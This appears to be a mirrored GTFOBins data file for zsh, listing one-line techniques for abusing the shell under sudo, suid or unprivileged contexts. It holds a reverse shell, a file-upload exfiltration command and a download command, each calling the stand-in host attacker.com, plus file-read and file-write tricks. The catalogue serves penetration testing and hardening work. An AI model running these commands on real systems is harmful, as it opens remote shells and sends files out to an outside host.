mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 22:46:19 +01:00
68 lines
1.3 KiB
Plaintext
68 lines
1.3 KiB
Plaintext
---
|
|
functions:
|
|
download:
|
|
- binary: false
|
|
code: |-
|
|
zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n "$(<&$REPLY)" >/path/to/output-file'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
sender: tcp-server
|
|
file-read:
|
|
- binary: false
|
|
code: |-
|
|
zsh -c 'echo "$(</path/to/input-file)"'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
- code: |-
|
|
zsh -c '</path/to/input-file'
|
|
comment: |-
|
|
This spawns a pager if run in a TTY.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
file-write:
|
|
- code: |-
|
|
zsh -c 'echo DATA >/path/to/output-file'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
inherit:
|
|
- code: |-
|
|
zsh -c '</etc/hosts'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
from: less
|
|
reverse-shell:
|
|
- code: |-
|
|
zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
listener: tcp-server
|
|
shell:
|
|
- code: |-
|
|
zsh
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
upload:
|
|
- binary: false
|
|
code: |-
|
|
zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n "$(</path/to/input-file)" >&$REPLY'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
receiver: tcp-server
|
|
...
|